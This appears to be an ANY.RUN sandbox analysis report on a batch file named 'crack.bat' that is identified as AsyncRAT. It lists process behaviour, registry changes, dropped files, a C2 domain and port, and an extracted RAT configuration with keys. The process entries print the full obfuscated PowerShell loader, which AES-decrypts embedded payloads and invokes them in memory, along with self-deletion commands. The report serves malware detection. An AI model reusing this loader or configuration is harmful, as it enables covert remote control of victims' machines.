File name:

crack.bat

Full analysis: https://app.any.run/tasks/2c61656e-0fe8-499f-935e-efa4ee49f086
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: January 19, 2024, 16:28:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
asyncrat
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

F5D7FE4E2519887840C8AFB0969E2066

SHA1:

FD54B06B8DD01E19C366088D0BCE6D4AAE83B75E

SHA256:

985A659EA23BB0E75A3F0A113BFEB19DA3F12C8C240ED5474FA6782F5A1E2721

SSDEEP:

1536:bmjnWtk1/AY5yVADRTKlV2lf1qWecN3Iwomqz5WrI2Dp:yjn43UyVepK7815l3lom7rI2t

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 764)

    • Drops the executable file immediately after the start

      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 764)

    • ASYNCRAT has been detected (YARA)

      • PYlfK.bat.exe (PID: 1624)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2184)
      • wscript.exe (PID: 668)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 2184)
      • wscript.exe (PID: 668)

    • Application launched itself

      • cmd.exe (PID: 2184)

    • The executable file from the user directory is run by the CMD process

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 764)

    • Process drops legitimate windows executable

      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 764)

    • Checks Windows Trust Settings

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)

    • Reads security settings of Internet Explorer

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)

    • Starts POWERSHELL.EXE for commands execution

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)

    • Reads the Internet Settings

      • crack.bat.exe (PID: 864)
      • wscript.exe (PID: 668)
      • PYlfK.bat.exe (PID: 1624)

    • The process executes VB scripts

      • crack.bat.exe (PID: 864)

    • Starts itself from another location

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 668)

    • Connects to unusual port

      • PYlfK.bat.exe (PID: 1624)

  • INFO

    • Checks supported languages

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)

    • Process checks Powershell version

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)

    • Reads the computer name

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)

    • Reads the machine GUID from the registry

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)

    • Create files in a temporary directory

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)

    • Creates files or folders in the user directory

      • crack.bat.exe (PID: 864)

    • Manual execution by a user

      • explorer.exe (PID: 2328)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process(1624) PYlfK.bat.exe
C2 (1)hicham157484.ddns.net
Ports (1)1995
BotnetDDNS
Version1.0.7 - modded by last
Options
AutoRunfalse
Mutex585S6655454S5DF45645
InstallFolder%AppData%
BSoDfalse
AntiVMfalse
Certificates
Cert1MIICMDCCAZmgAwIBAgIVAK254qxL0D5CtQ8/3w+pi+LKorqRMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDUzMTE2MjQyMFoXDTMzMDMwOTE2MjQyMFowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0A...
Server_SignatureGkYP70fXw7CFQM88GsqeigCv69/V/JAvpAP9Q8tZMOT72y1FvjuCC30chptms5v4Y7uWn6PJzoKzDc510+epBd7Y86sa/N+8w75iohN/iuuGSP+5hXJLOOfhzVB1hCYTeZrAy+7z2+ZZrkFicGVhR0JwZcPeUhLAv1TOJLFNrNk=
Keys
AESbdb9b2504d0f1b1dc813ce51bdd0fb902c44ce2e5b814733dd32871b28a43a53
SaltDcRatByqwqdanchun
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
9
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe crack.bat.exe no specs powershell.exe no specs wscript.exe no specs cmd.exe #ASYNCRAT pylfk.bat.exe powershell.exe no specs explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
668"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\PYlfK.vbs" C:\Windows\System32\wscript.execrack.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
764C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\PYlfK.bat" "C:\Windows\System32\cmd.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
864"C:\Users\admin\AppData\Local\Temp\crack.bat.exe" -w hidden -c $jzKo='MadXcoindXcoModdXcouldXcoedXco'.Replace('dXco', '');$eYtj='ChdXcoadXcondXcogdXcoeExdXcotendXcosidXcoondXco'.Replace('dXco', '');$dRkz='SpdXcolidXcotdXco'.Replace('dXco', '');$bVfn='TrdXcoandXcosfodXcordXcomFdXcoindXcoalBldXcoodXcockdXco'.Replace('dXco', '');$giLx='GetdXcoCudXcordXcordXcoedXcontPdXcorodXcocesdXcosdXco'.Replace('dXco', '');$webT='EntrdXcoyPoidXcontdXco'.Replace('dXco', '');$ffmv='ReadXcoddXcoLdXcoindXcoesdXco'.Replace('dXco', '');$PXRR='LoadXcoddXco'.Replace('dXco', '');$dKEd='InvdXcookdXcoedXco'.Replace('dXco', '');$sPZA='FirsdXcotdXco'.Replace('dXco', '');$cPVb='FrdXcoodXcomBasdXcoe6dXco4SdXcotridXcongdXco'.Replace('dXco', '');$vWWN='CrdXcoeadXcotdXcoeDdXcoecdXcorypdXcotodXcordXco'.Replace('dXco', '');function ytOKY($UgShh){$nQSSE=[System.Security.Cryptography.Aes]::Create();$nQSSE.Mode=[System.Security.Cryptography.CipherMode]::CBC;$nQSSE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$nQSSE.Key=[System.Convert]::$cPVb('NMt3rNI/wp+nJ12Vs3HqHBKYTdy9XTgCh41mNLi87Mk=');$nQSSE.IV=[System.Convert]::$cPVb('LDO9q3lBzKERTmm9/mJCuA==');$TAQNr=$nQSSE.$vWWN();$tKckD=$TAQNr.$bVfn($UgShh,0,$UgShh.Length);$TAQNr.Dispose();$nQSSE.Dispose();$tKckD;}function ECarK($UgShh){$FPIye=New-Object System.IO.MemoryStream(,$UgShh);$nUUYR=New-Object System.IO.MemoryStream;$pgFfq=New-Object System.IO.Compression.GZipStream($FPIye,[IO.Compression.CompressionMode]::Decompress);$pgFfq.CopyTo($nUUYR);$pgFfq.Dispose();$FPIye.Dispose();$nUUYR.Dispose();$nUUYR.ToArray();}$iHlYj=[System.Linq.Enumerable]::$sPZA([System.IO.File]::$ffmv([System.IO.Path]::$eYtj([System.Diagnostics.Process]::$giLx().$jzKo.FileName, $null)));$qudXP=$iHlYj.Substring(3).$dRkz(':');$BCPpn=ECarK (ytOKY ([Convert]::$cPVb($qudXP[0])));$NcaBP=ECarK (ytOKY ([Convert]::$cPVb($qudXP[1])));[System.Reflection.Assembly]::$PXRR([byte[]]$NcaBP).$webT.$dKEd($null,$null);[System.Reflection.Assembly]::$PXRR([byte[]]$BCPpn).$webT.$dKEd($null,$null);C:\Users\admin\AppData\Local\Temp\crack.bat.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\users\admin\appdata\local\temp\crack.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1072C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\crack.bat" C:\Windows\System32\cmd.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1624"C:\Users\admin\AppData\Roaming\PYlfK.bat.exe" -w hidden -c $jzKo='MadXcoindXcoModdXcouldXcoedXco'.Replace('dXco', '');$eYtj='ChdXcoadXcondXcogdXcoeExdXcotendXcosidXcoondXco'.Replace('dXco', '');$dRkz='SpdXcolidXcotdXco'.Replace('dXco', '');$bVfn='TrdXcoandXcosfodXcordXcomFdXcoindXcoalBldXcoodXcockdXco'.Replace('dXco', '');$giLx='GetdXcoCudXcordXcordXcoedXcontPdXcorodXcocesdXcosdXco'.Replace('dXco', '');$webT='EntrdXcoyPoidXcontdXco'.Replace('dXco', '');$ffmv='ReadXcoddXcoLdXcoindXcoesdXco'.Replace('dXco', '');$PXRR='LoadXcoddXco'.Replace('dXco', '');$dKEd='InvdXcookdXcoedXco'.Replace('dXco', '');$sPZA='FirsdXcotdXco'.Replace('dXco', '');$cPVb='FrdXcoodXcomBasdXcoe6dXco4SdXcotridXcongdXco'.Replace('dXco', '');$vWWN='CrdXcoeadXcotdXcoeDdXcoecdXcorypdXcotodXcordXco'.Replace('dXco', '');function ytOKY($UgShh){$nQSSE=[System.Security.Cryptography.Aes]::Create();$nQSSE.Mode=[System.Security.Cryptography.CipherMode]::CBC;$nQSSE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$nQSSE.Key=[System.Convert]::$cPVb('NMt3rNI/wp+nJ12Vs3HqHBKYTdy9XTgCh41mNLi87Mk=');$nQSSE.IV=[System.Convert]::$cPVb('LDO9q3lBzKERTmm9/mJCuA==');$TAQNr=$nQSSE.$vWWN();$tKckD=$TAQNr.$bVfn($UgShh,0,$UgShh.Length);$TAQNr.Dispose();$nQSSE.Dispose();$tKckD;}function ECarK($UgShh){$FPIye=New-Object System.IO.MemoryStream(,$UgShh);$nUUYR=New-Object System.IO.MemoryStream;$pgFfq=New-Object System.IO.Compression.GZipStream($FPIye,[IO.Compression.CompressionMode]::Decompress);$pgFfq.CopyTo($nUUYR);$pgFfq.Dispose();$FPIye.Dispose();$nUUYR.Dispose();$nUUYR.ToArray();}$iHlYj=[System.Linq.Enumerable]::$sPZA([System.IO.File]::$ffmv([System.IO.Path]::$eYtj([System.Diagnostics.Process]::$giLx().$jzKo.FileName, $null)));$qudXP=$iHlYj.Substring(3).$dRkz(':');$BCPpn=ECarK (ytOKY ([Convert]::$cPVb($qudXP[0])));$NcaBP=ECarK (ytOKY ([Convert]::$cPVb($qudXP[1])));[System.Reflection.Assembly]::$PXRR([byte[]]$NcaBP).$webT.$dKEd($null,$null);[System.Reflection.Assembly]::$PXRR([byte[]]$BCPpn).$webT.$dKEd($null,$null);C:\Users\admin\AppData\Roaming\PYlfK.bat.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\users\admin\appdata\roaming\pylfk.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
AsyncRat
(PID) Process(1624) PYlfK.bat.exe
C2 (1)hicham157484.ddns.net
Ports (1)1995
BotnetDDNS
Version1.0.7 - modded by last
Options
AutoRunfalse
Mutex585S6655454S5DF45645
InstallFolder%AppData%
BSoDfalse
AntiVMfalse
Certificates
Cert1MIICMDCCAZmgAwIBAgIVAK254qxL0D5CtQ8/3w+pi+LKorqRMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDUzMTE2MjQyMFoXDTMzMDMwOTE2MjQyMFowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0A...
Server_SignatureGkYP70fXw7CFQM88GsqeigCv69/V/JAvpAP9Q8tZMOT72y1FvjuCC30chptms5v4Y7uWn6PJzoKzDc510+epBd7Y86sa/N+8w75iohN/iuuGSP+5hXJLOOfhzVB1hCYTeZrAy+7z2+ZZrkFicGVhR0JwZcPeUhLAv1TOJLFNrNk=
Keys
AESbdb9b2504d0f1b1dc813ce51bdd0fb902c44ce2e5b814733dd32871b28a43a53
SaltDcRatByqwqdanchun
1928"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1624);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePYlfK.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2016"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(864);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execrack.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2184C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\crack.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2328"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events
4 379
Read events
4 341
Write events
38
Delete events
0

Modification events

(PID) Process:(864) crack.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(864) crack.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(864) crack.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(864) crack.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(668) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(668) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(668) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(668) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1624) PYlfK.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1624) PYlfK.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
2
Suspicious files
10
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
864crack.bat.exeC:\Users\admin\AppData\Roaming\PYlfK.battext
MD5:F5D7FE4E2519887840C8AFB0969E2066
SHA256:985A659EA23BB0E75A3F0A113BFEB19DA3F12C8C240ED5474FA6782F5A1E2721
864crack.bat.exeC:\Users\admin\AppData\Local\Temp\k3nna4ig.rtu.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1624PYlfK.bat.exeC:\Users\admin\AppData\Local\Temp\pmbpekqh.2qg.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1624PYlfK.bat.exeC:\Users\admin\AppData\Local\Temp\jbcla5d5.ipo.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
864crack.bat.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
1072cmd.exeC:\Users\admin\AppData\Local\Temp\crack.bat.exeexecutable
MD5:EB32C070E658937AA9FA9F3AE629B2B8
SHA256:70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE
864crack.bat.exeC:\Users\admin\AppData\Local\Temp\0lfomamd.5a3.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2016powershell.exeC:\Users\admin\AppData\Local\Temp\xjoz1uem.zod.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
864crack.bat.exeC:\Users\admin\AppData\Roaming\PYlfK.vbstext
MD5:7DACF695C618212681382A41847966BB
SHA256:56F014108D30FA1C0656BDD7908461FDEC451A68B41F62151237B7CB61D98C5A
1928powershell.exeC:\Users\admin\AppData\Local\Temp\solpenz1.kml.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
16
DNS requests
6
Threats
5

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
1624
PYlfK.bat.exe
45.74.34.32:1995
hicham157484.ddns.net
M247 Ltd
US
unknown

DNS requests

Domain
IP
Reputation
hicham157484.ddns.net
  • 45.74.34.32
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
1080
svchost.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080
svchost.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080
svchost.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080
svchost.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080
svchost.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
crack.bat